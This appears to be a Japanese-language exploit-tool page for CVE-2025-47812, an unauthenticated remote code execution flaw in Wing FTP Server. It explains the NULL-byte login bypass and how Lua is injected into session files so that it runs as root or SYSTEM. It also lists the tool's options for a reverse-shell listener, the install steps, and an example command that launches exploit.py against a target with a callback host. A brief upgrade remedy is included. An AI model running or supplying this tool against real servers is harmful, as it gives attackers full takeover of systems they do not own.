## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-PEVINKUMAR10-CVE-2025-47812
**CVE-2025-47812 不適切な入力検証により、リモートコード実行からシステム全体の侵害に至る**
 
## 📘 はじめに:
RCE SecurityのJulien Ahrens氏が、WingFTPに影響を与える重大なセキュリティ脆弱性を発見しました。CVE-2025-47812として追跡されるこの脆弱性のCVSSスコアは10です。この脆弱性が悪用されると、リモートの未認証の攻撃者が任意のコードを実行し、システム全体が侵害される可能性があります。
Wing FTP Serverは、クロスプラットフォームでユーザーフレンドリーかつセキュアなFTPサーバーソフトウェアです。FTP、FTPS、HTTP、HTTPS、SFTPなどの複数のファイル転送プロトコルをサポートしており、クライアント接続に柔軟性を提供します。
CVE-2025-47812の調査のため、Linuxホスト上でWing FTP Server 7.4.3を実行するDockerコンテナを展開しました。コンテナはWebインターフェースを公開するように構成し、未認証のテストを容易にするために匿名ログインを有効にしました。さらに、認証シナリオをシミュレートするためにテストユーザーアカウント(`dev-test:test`)を作成しました。この設定により、脆弱性を再現し、エクスプロイトの動作を検証するための安全で管理された環境が提供されました。
## 🚨 脆弱性の概要:
* CVE ID: CVE-2025-47812
* CVSS v3.1 Vector:
* CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
* Base Score: 10.0 (クリティカル)
* Affected Software: <= 7.4.3
* Impact: リモートコード実行によりシステム全体が侵害される。
* Exploitation Prerequisites:
* 匿名ログインが許可されているか、有効なユーザー認証情報
* ユーザーにsudo権限は不要
## 🧪 エクスプロイトの説明:
ユーザーがログインしようとすると、c_CheckUser 呼び出しが行われます。この呼び出しは、ユーザー名内のNULLバイト以降の内容に関係なく、NULLバイトより前の文字列が既存のユーザーと一致する限り、常に OK_CHECK_CONNECTION を返します。攻撃者は、既知のユーザー名にNULLバイトと追加の値を追加することで、パスワードチェックをバイパスする可能性があります。システムは strlen() を使用してユーザー名のサイズを取得しますが、strlen はNULLバイト終端文字に達するまでのすべての文字のみをカウントし、サニタイズされていないユーザー名と照合します。
サニタイズされていないユーザー名(挿入されたNULLと悪意のあるペイロードを含む)は、Luaコードとしてセッションファイルに直接保存されます。これらのセッションファイルは .lua ファイルに類似しており、後でセッションがロードされるときに実行されます。LinuxではWing FTPサーバーはrootとして実行され、WindowsではSYSTEMとして実行されます。挿入されたLuaペイロードは、セッションの再読み込み時に完全な権限で実行されます。
注: この動作は、パスワードが設定されていない場合、または有効な認証情報を使用した場合にのみ発生します。ユーザーにパスワードが設定されている場合、厳格なパスワード検証が適用されます。
## ⚒️ Install:
### Options:
root@kitploit:~
Options:
-t, --target Target Wing FTP Server URL (e.g., http://192.168.1.100)
-u, --username Username to authenticate (default: anonymous)
-p, --password Password to authenticate (default: empty)
-lh, --lhost Local host to listen for reverse shell (default: 127.0.0.1)
-lp, --lport Local port to listen for reverse shell (default: 31337)
-ns, --no-shell To specify the exploit to not span a temp shell. (Note if it set should manually set listener)
-v, --verbose Enable verbose/debug output
-h, --help Show this help message and exit
### Usage:
root@kitploit:~
git clone https://github.com/pevinkumar10/CVE-2025-47812
cd CVE-2025-47812
pip3 install -r requirements.txt
### 🎯 悪用:

_CVE-2025-47812 - Wing FTPサーバー 未認証RCE_

_CVE-2025-47812 - Wing FTPサーバー 認証済みRCE (dev-test:test)_
#
Example usage:
root@kitploit:~
python3 exploit.py --target http://172.17.0.2 --lhost 172.17.0.1 -lport 31336
## 🛡️ 修復:
* ユーザーはWingFTPバージョン7.4.4にアップグレードして脆弱性を修正する必要があります。
* 詳細については、WingFTPリリースノートを参照してください。
## 📜 参考情報とクレジット:
* 元のエクスプロイト作成者: Sheikh Mohammad Hasan(別名 4m3rr0r)
* Qualys
* エクスプロイト
注: 上記の参照を研究目的で使用し、より多くの機能と堅牢なエラーハンドリングを備えたエクスプロイトに更新しました。
## ⚖️ ライセンス:
このPython PoCはMITライセンスの下で公開されています。元のエクスプロイトのコンセプトと開示の功績はStratascale Cyber Research Unitに帰属します。